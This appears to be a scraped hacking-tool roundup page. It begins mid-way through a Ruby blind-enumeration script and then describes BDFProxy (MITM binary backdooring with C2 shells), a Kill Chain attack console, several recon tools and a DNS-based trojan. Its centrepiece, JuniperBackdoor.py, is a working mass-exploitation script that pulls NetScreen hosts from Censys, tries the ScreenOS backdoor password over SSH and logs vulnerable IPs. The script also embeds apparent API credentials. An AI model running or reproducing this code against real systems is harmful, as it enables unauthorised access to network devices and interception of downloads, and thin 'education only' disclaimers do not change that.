			   	                    	break
						end
					end
				else
					for ch in $arrn2
						if $hex == "y"
							configreq("=" + "0x" + ch.unpack('H*')[0])
						else
							configreq("=" + $oh + ch)
						end
						sendreq()
						send2ndreq() if $secfile != ""
						$fheader = "n"
						$response.to_hash.each { |k,v|
							$fheader = "y" if k.to_s.include?($search)
							$fheader = "y" if v.to_s.include?($search)
						}
						if $response.body.include?($search) || $fheader == "y"
							$result = $result + ch
		      			              	puts "Letter " + $i.to_s + " found: " + ch
							found = 1
			   	                    	break
						end
					end
				end
			end
		end

		# special character
		if found == 0
			for ch in $arrs
				if $hex == "y"
					configreq("=" + "0x" + ch.unpack('H*')[0])
				else
					configreq("=" + $oh + ch)
				end
				sendreq()
				send2ndreq() if $secfile != ""
				$fheader = "n"
				$response.to_hash.each { |k,v|
					$fheader = "y" if k.to_s.include?($search)
					$fheader = "y" if v.to_s.include?($search)
				}
				if $response.body.include?($search) || $fheader == "y"
					$result = $result + ch
			      	       	puts "Letter " + $i.to_s + " found: " + ch
					found = 1
			               	break
				end
			end
		end
	end

	# printing results
	if found == 0
		if $result == ""
        		puts "No results. Probably wrong pattern."
	            	break
	        else 
			puts "\nFull result:\n" + $result
			break
	        end
        end
end

# means that there are still chars to enumerate
if found == 1
	puts "\nRetreving not finished:\n" + $result
end

Source : https://github.com/enjoiz

For security professionals and researchers only.

Changelog v0.3.8 12/20/2015:
+ Added configuration options in bdfproxy.cfg to support PE code signing from BDF => CODE_SIGN See BDF README for details.

This script rides on two libraries for usage: The Backdoor Factory (BDF) and the mitmProxy.
Concept:
Patch binaries during download ala MITM.
Why:
Because a lot of security tool websites still serve binaries via non-SSL/TLS means.
Here’s a short list:

sysinternals.com
Microsoft - MS Security Essentials
Almost all anti-virus companies
Malwarebytes
Sourceforge
gpg4win
Wireshark
etc...

+ Supported Environment:

Tested on all Kali Linux builds, whether a physical beefy laptop, a Raspberry Pi, or a VM, each can run BDFProxy.

Install:
BDF is in bdf/
Run the following to pull down the most recent:

./install.sh

OR:

git clone https://github.com/secretsquirrel/the-backdoor-factory bdf/
If you get a certificate error, run the following:

mitmproxy
And exit [Ctr+C] after mitmProxy loads.

Usage:

Update everything before each use:

./update.sh

 READ THE CONFIG!!!

-->bdfproxy.cfg

You will need to configure your C2 host and port settings before running BDFProxy. DO NOT overlap C2 PORT settings between different payloads. You’ll be sending linux shells to windows machines and things will be segfaulting all over the place. After running, there will be a metasploit resource script created to help with setting up your C2 communications. Check it carefully. By the way, everything outside the [Overall] section updates on the fly, so you don’t have to kill your proxy to change settings to work with your environment.

But wait! You will need to configure your mitm machine for mitm-ing! If you are using a wifiPineapple I modded a script put out by hack5 to help you with configuration. Run ./wpBDF.sh and enter in the correct configs for your environment. This script configures iptables to push only http (non-ssl) traffic through the proxy. All other traffic is fowarded normally.

Then:

./bdf_proxy.py

Here’s some sweet ascii art for possible phyiscal settings of the proxy:
Lan usage:

<Internet>----<mitmMachine>----<userLan>

WIFI Usage :

<Internet>----<mitmMachine>----<wifiPineapple>))

 Testing : 

Suppose you want to use your browser with Firefox and FoxyProxy to connect to test your setup.

    Update your config as follows:
    transparentProxy = False

    Configure FoxyProxy to use BDFProxy as a proxy.
    Default port in the config is 8080.

+ Logging:

We have it. The proxy window will quickly fill with massive amounts of cat links depending on the client you are testing. Use tail -f proxy.log to see what is getting patched and blocked by your blacklist settings. However, keep an eye on the main proxy window if you have chosen to patch binaries manually, things move fast and behind the scences there is multi-threading of traffic, but the intial requests and responses are locking for your viewing pleasure.

+ Attack Scenarios (all with permission of targets):
-Evil Wifi AP
-Arp Redirection
-Physical plant in a wiring closet
-Logical plant at your favorite ISP

Download : 0.3.8.zip  | 0.3.8.tar.gz  |Our Post Before | Source : https://github.com/secretsquirrel

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr

Crawlic is a Web recon tool (find temporary files, parse robots.txt, search folders, google dorks and search domains hosted on same server)
Automatic GIT/SVN clone (using dvcs-ripper) if .git or .svn folder if found.
Latest change 21/12/2015 : crawlic.py Fix path errors

Crawlic Helper

Requirements :
+ Python 2.7.x
+ git/svn ripper needs LWP.pm library (Original dvcs ripper: https://github.com/kost/dvcs-ripper)
+ pholcidae library

Configuration :
– Change user-agent : Edit user_agent.lst, one user agent per line
– Change folders to find : Edit folders.lst, one directory per line
– Change files to scan : Edit extensions.lst, one file extension per line
– Change dorks list : Edit dorks.lst, one dork per line
– Change google dorks list : Edit google_dorks, one dork per line, use %s as target url

Installation:

git clone https://github.com/Ganapati/Crawlic
cd Crawlic
pip install pholcidae
./crawlic.py -h (for helper)

Source: https://github.com/Ganapati

“Kill Chain” is a unified console with an anonymizer that will perform these stages of attacks:
+ Reconnaissance
+ Weaponization
+ Delivery
+ Exploit
+ Installation
+ Command & Control
+ And Actions

Changelog v0.2 : killchain.py; IPTables rules.

killchain-v-0-2

Menu Options :
1) Anonymizer — Load Tor Iptables rules, route all traffic thru Tor.
2) De-Anonymizer — Flush Tor Iptables rules set to default rules.
3) Set — Social-Engineer Toolkit (SET), attacks against humans.
4) OpenVas — Vulnerability scanning and vulnerability management.
5) Veil-Evasion — Generate metasploit payloads bypass anti-virus.
6) Websploit Framework — WebSploit Advanced MITM Framework.
7) Metasploit Framework — Executing exploit code against target.
8) WiFite — Automated wireless auditor, designed for Linux.
9) Exit Kill Chain

Installation:

git clone https://github.com/ruped24/killchain
cd killchain
python killchain.py

update
cd killchain
git pull

killchain.py script:

#!/usr/bin/env python
#

from __future__ import print_function
from __future__ import absolute_import
from random import randint
from socket import gethostname
from sys import exit, stderr
from commands import getoutput
from subprocess import call
from time import sleep
from os import environ, devnull
from os.path import isfile

fnull = open(devnull, 'w')

__author__ = "Rupe"
__date__ = "June 14 2015"
__copyright__ = "Linux Professional Training"
__version__ = "0.2"
__license__ = "GPL"
__email__ = "ruped24@gmail.com"


class Colors:
  Escape = "\033"
  Lred = "[91m"
  Lgre = "[92m"
  Lyel = "[93m"


class Header:
  headers = {
      1: r"""
         **   ** **  **  **         ******  **                **
        /**  ** //  /** /**        **////**/**               //
        /** **   ** /** /**       **    // /**       ******   ** *******
        /****   /** /** /**      /**       /******  //////** /**//**///**
        /**/**  /** /** /**      /**       /**///**  ******* /** /**  /**
        /**//** /** /** /**      //**    **/**  /** **////** /** /**  /**
        /** //**/** *** ***       //****** /**  /**//********/** ***  /**
        //   // // /// ///         //////  //   //  //////// // ///   //   """,
      2: r"""
        KK  KK iii lll lll     CCCCC  hh              iii
        KK KK      lll lll    CC    C hh        aa aa     nn nnn
        KKKK   iii lll lll    CC      hhhhhh   aa aaa iii nnn  nn
        KK KK  iii lll lll    CC    C hh   hh aa  aaa iii nn   nn
        KK  KK iii lll lll     CCCCC  hh   hh  aaa aa iii nn   nn  """,
      3: r"""
        $$\   $$\ $$\ $$\ $$\        $$$$$$\  $$\                 $$\
        $$ | $$  |\__|$$ |$$ |      $$  __$$\ $$ |                \__|
        $$ |$$  / $$\ $$ |$$ |      $$ /  \__|$$$$$$$\   $$$$$$\  $$\ $$$$$$$\
        $$$$$  /  $$ |$$ |$$ |      $$ |      $$  __$$\  \____$$\ $$ |$$  __$$\
        $$  $$<   $$ |$$ |$$ |      $$ |      $$ |  $$ | $$$$$$$ |$$ |$$ |  $$ |
        $$ |\$$\  $$ |$$ |$$ |      $$ |  $$\ $$ |  $$ |$$  __$$ |$$ |$$ |  $$ |
        $$ | \$$\ $$ |$$ |$$ |      \$$$$$$  |$$ |  $$ |\$$$$$$$ |$$ |$$ |  $$ |
        \__|  \__|\__|\__|\__|       \______/ \__|  \__| \_______|\__|\__|  \__|  """,
  }


class Tools:
  tool = {
      'helper': 'which',
      3: "setoolkit",
      4: "openvas-setup",
      5: "veil-evasion",
      6: "websploit",
      7: "msfconsole",
      8: "wifite"
  }


class TorIptables(object):
  def __init__(self):
    self.tor_config_file = '/etc/tor/torrc'
    self.torrc = '''
VirtualAddrNetwork 10.0.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 53
'''
    self.non_tor_net = ["192.168.0.0/16", "172.16.0.0/12"]
    self.non_tor = ["127.0.0.0/9", "127.128.0.0/10", "127.0.0.0/8"]
    self.tor_uid = getoutput("id -ur debian-tor")  # Tor user uid
    self.trans_port = "9040"  # Tor port

  def flush_iptables_rules(self):
    call(["iptables", '-F'])
    call(["iptables", "-t", "nat", "-F"])

  def load_iptables_rules(self):
    self.flush_iptables_rules()
    self.non_tor.extend(self.non_tor_net)

    call(["iptables", "-t", "nat", "-A", "OUTPUT", "-m", "owner", "--uid-owner",
          "%s" % self.tor_uid, "-j", "RETURN"])
    call(["iptables", "-t", "nat", "-A", "OUTPUT", "-p", "udp", "--dport", "53",
          "-j", "REDIRECT", "--to-ports", "53"])

    for net in self.non_tor:
      call(["iptables", "-t", "nat", "-A", "OUTPUT", "-d", "%s" % net,
            "-j", "RETURN"])

    call(["iptables", "-t", "nat", "-A", "OUTPUT", "-p", "tcp", "--syn", "-j",
          "REDIRECT", "--to-ports", "%s" % self.trans_port])

    call(["iptables", "-A", "OUTPUT", "-m", "state", "--state",
          "ESTABLISHED,RELATED", "-j", "ACCEPT"])

    for net in (self.non_tor):
      call(["iptables", "-A", "OUTPUT", "-d", "%s" % net, "-j", "ACCEPT"])

    call(["iptables", "-A", "OUTPUT", "-m", "owner", "--uid-owner", "%s" %
          self.tor_uid, "-j", "ACCEPT"])
    call(["iptables", "-A", "OUTPUT", "-j", "REJECT"])

    # Restart Tor
    call(["service", "tor", "restart"], stderr=fnull)


def who_did_it():
  print("        {0}".format("#" * 64))
  print("        {0}".format("Created by: %s." % __copyright__))
  print("        {0}".format("For training purposes only."))
  print("        {0}, {1}".format("Version %s" % __version__,
                                  "License %s" % __license__))
  print("        {0}".format("Written by: %s" % __author__))
  print("        {0}".format("#" * 64 + "\n\n"))


def main_menu():
  print("        {0}".format(
      c.Escape + c.Lyel +
      "1)  Anonymizer -- Load Tor Iptables rules, route all traffic thru Tor.\n"))
  print("        {0}".format(
      "2)  De-Anonymizer -- Flush Tor Iptables rules set to default rules.\n"))
  print("        {0}".format(
      "3)  Set -- Social-Engineer Toolkit (SET), attacks against humans.\n"))
  print("        {0}".format(
      "4)  OpenVas --  Vulnerability scanning and vulnerability management.\n"))
  print("        {0}".format(
      "5)  Veil-Evasion -- Generate metasploit payloads bypass anti-virus.\n"))
  print("        {0}".format(
      "6)  Websploit Framework -- WebSploit Advanced MITM Framework.\n"))
  print("        {0}".format(
      "7)  Metasploit Framework -- Executing exploit code against target.\n"))
  print("        {0}".format(
      "8)  WiFite -- Automated wireless auditor, designed for Linux.\n"))
  print("        {0}".format(c.Escape + c.Lred + "9)  Exit Kill Chain\n"))


def anon_status():
  anon = getoutput("iptables -S -t nat | grep 53")
  if anon:
    print("        {0} {1}".format("Anonymizer status",
                                   c.Escape + c.Lgre + "[ON]\n"))
  else:
    print("        {0} {1}".format("Anonymizer status",
                                   c.Escape + c.Lred + "[OFF]\n"))


if __name__ == '__main__':
  load_tables = TorIptables()
  try:
    raw_input
  except NameError:
    raw_input = input
  try:
    while True:
      stderr.write("\x1b[2J\x1b[H")
      call(['reset'])
      try:
        c = Colors()
        print(c.Escape + "[" + repr(randint(92, 97)) + "m" +
              Header().headers[randint(1, 3)] + "\n\n")
        who_did_it()
        anon_status()
        main_menu()
        try:
          tool = Tools().tool
          selected = int(
              raw_input(c.Escape + c.Lgre + gethostname() + "-gOtr00t"
                        ":> "))
          if selected < 1 or selected > 9:
            print("Select a number between 1 and 9")
            sleep(2)
          if selected is 9:
            exit(0)
          if selected is 1:
            if isfile(load_tables.tor_config_file):
              if not 'VirtualAddrNetwork' in open(
                  load_tables.tor_config_file).read():
                with open(load_tables.tor_config_file, 'a+') as torrconf:
                  torrconf.write(load_tables.torrc)
            load_tables.load_iptables_rules()
          sleep(1)

          if selected is 2:
            load_tables.flush_iptables_rules()
            sleep(1)
          if selected is 3:
            call(['clear'])
            call([getoutput(tool['helper'] + ' ' + tool[3])])
            sleep(1)
          if selected is 4:
            call(['clear'])
            call([getoutput(tool['helper'] + ' ' + tool[4])])
            sleep(1)
          if selected is 5:
            call(['clear'])
            call([getoutput(tool['helper'] + ' ' + tool[5])])
            sleep(1)
          if selected is 6:
            call(['clear'])
            call([getoutput(tool['helper'] + ' ' + tool[6])])
            sleep(1)
          if selected is 7:
            call(['clear'])
            call([getoutput(tool['helper'] + ' ' + tool[7])])
            sleep(1)
          if selected is 8:
            call(['clear'])
            call([getoutput(tool['helper'] + ' ' + tool[8])])
            sleep(5)
        except ValueError:
          print("Select a number between 1 and 9")
          sleep(2)
      except SystemExit:
        exit(0)
  except OSError as err:
    print("\n [*] Check your path " + c.Escape + c.Lred + "%s\n %s" %
          (environ['PATH'], "[!] " + c.Escape + c.Lyel + "Can't find"),
          c.Escape + c.Lgre + tool[selected] + ", " + err[1],
          c.Escape + c.Lred + "Aborting!")
    sleep(2)
    pass

Source: https://github.com/ruped24 | Our Post Before

Changelog v1.1.14 Full Featured:
+ DNS Enumeration
+ Mail Server Enumeration
+ Zone Transfer Testing
+ Wild Card Testing
+ Sub-Domain Brute-Forcing (Top 20,000 sub-domains from the The Alexa Top 1 Million)
+ Interesting Target Identification
+ Passive Sub-Domain Gathering (NetCraft)
+ Email Enumeration (Google, Bing, LinkedIn)
+ User Enumeration (LinkedIn)
+ Source Smart Searching (Google, Bing, LinkedIn searches based on your location, to make sure searches are as fast as possible)
+ Evidence Report (Gives you the url locations of the gathered data to allow for potential remediation)

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub processing on the top 20000 of the ‘The Alexa Top 1 Million subdomains’. NetCraft results are presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.

Bluto-v-1-1-14
Bluto v1.1.6
Bluto is attempting to brute force the target domain. this Tools has been tested on Ubuntu, Arch Linux, Centos, FreeBSD,redhat Fedora, Debian And Kali 2.0

Installation :

wget https://github.com/RandomStorm/Bluto/releases/download/v1.1.14/Bluto-1.1.14.tar.gz
tar xf Bluto-1.1.14.tar.gz
cd Bluto-1.1.14.tar.gz
python setup.py install
for run bluto


pip install git+git://github.com/RandomStorm/Bluto
Upgrade:
pip install git+git://github.com/RandomStorm/Bluto --upgrade

Our Post Before
Source: https://github.com/RandomStorm

Changelog in v0.7 Modules Added:
+ Modules Added in v0.7 : (x) Google Docx Search
+ Issues Fixed in v0.7: (x) Fixed issues with Except statement in a few modules

SimplyEMail-v-0-7

SimplyEmail
What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.

SimpleEmail is a email recon tool that is fast and easy framework to build on

Scrape EVERYTHING – Simply
A few small benfits:
+ Easy for you to write modules (All you need is 3 required Class options and your up and running)
+ Multiprocessing Queue for modules and Result Queue for easy handling of Email data
+ Simple intergration of theHarvester Modules and new ones to come
+ Also the ability to change major settings fast without diving into the code

Latest Change :
– Common : Task Queue Updates
– Module : Task Queue Updates
– Helper : Task Queue Updates

Installation :

git clone https://github.com/killswitch-GUI/SimplyEmail
cd SimplyEmail
./Setup.sh
python SimplyEmail.py | Or ./SimplyEmail.py

Update:
cd SimplyEmail
git pull

Our Post Before
Source : https://github.com/killswitch-GUI

Background:
Censys is a networking device to search for information about new search engine, security experts can use it to evaluate their programs to achieve security, hackers can use it as a preliminary investigation target, target information collected powerful weapon. Its function is very similar to the very popular Shodan, however, compared with the Shodan its advantage is that this is a free search engine, originally published by researchers at the University of Michigan in October, is currently supported by Google. Chief Information Security Officer Bob Worrall Juniper’s senior vice president, said, discovered two vulnerabilities in recent internal code audit process, the impact of ScreenOS 6.2.0r15-6.2.0r18,6.3.0r12-6.3.0r20 version. One is not authorization code vulnerabilities can be decrypted VPN traffic; another could allow an attacker to remotely manage through SSH or telnet access device.
Juniper mentioned that access to these systems will be recorded, password authentication will be successful, but the attacker can change or delete the log entry.

JuniperBackdoor.py Script:

from pexpect import pxssh
from Queue import Queue
import threading
import time
import re
import sys
import json
import requests
import math

user = "root"
passwd = "<<< %s(un='%s') = %u"

API_URL = "https://www.censys.io/api/v1"
UID = "373ab943-2e4b-4088-b1ac-396c0c21ce2c"
SECRET = "sRwAT71mrRJnyZBD95sjEjkFLXRjP5n6"

PAGES = 50
cur_page = 1
thread_num = 20

queue = Queue()

class testTarget(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        global queue
        while True:
            for i in range(5):
                if not queue.empty():
                    ip = queue.get()
                else:
                    break
                theSSH = connectSSH(ip, user, passwd)
                if theSSH:
                    before = theSSH.before
                    try:
                        theSSH.logout()
                    except:
                        pass
                    isval = re.search('Remote Management Console', before)
                    if isval:
                        print "%s is vul" % ip
                        ip_OK.write("%s\n" % ip)
                        ip_OK.flush()
                    else:
                        print "%s is not vul" %ip
            time.sleep(1)

def connectSSH(host, user, passwd):
    try:
        ssh = pxssh.pxssh()
        ssh.login(host, user, passwd, auto_prompt_reset = False)
        return ssh
    except Exception, e:
        print "%s is not vul" % host

def getIp(page):
    start_time = time.time()
    data = {
        "query":"22.ssh.banner.software_version:NetScreen location.country:China", 
        "page":page, 
        "fields":["ip"]
    }
    try:
        res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET))
    except:
        pass
    else:
        try:
            results = res.json()
        except:
            pass
        else:
            if res.status_code != 200:
                print "error occurred: %s" % results["error"]
                sys.exit(1)
            else:
                result_iter = iter(results["results"])
                for result in result_iter:
                    queue.put(result["ip"])

def test():
    for i in range(thread_num):
        t = testTarget()
        t.start()

if __name__ == '__main__':
    ip_OK = open("ip_OK.txt", "w")
    getIp(cur_page)
    test()
    while queue.qsize() > 0:
        if cur_page <= PAGES:
            getIp(cur_page)
            cur_page += 1
        time.sleep(0.1)
    ip_OK.close()

Source : https://github.com/s0m30ne

NOTICE : This post and how to build it, just For Education and Research Purpose Only!

dnschan This is a trojan that runs over DNS.
Latest Change 23/12/2015:
– DNSClient : minor client updates
– DNSServer : tiny bug fix
Requirement:
+ Windows
+ Visual Studio Comunity

You can:
+ handle multiple agents
+ (very slowly) upload files
+ fetch files from the web
+ run processes

Usage & Installation using git:

open CMD
git clone https://github.com/rwhitcroft/dnschan
cd dnschan\DNSClient
MSBuild DNSClient.sln /p:PlatformToolset=v140
go to DNSSErver
ruby main.rb
back to DNSClient Folder
then run DNSClient.exe

How To Build DNSClient Using Command Prompt at windows 32 Bit/x85 using Visual Studio

Source : https://github.com/rwhitcroft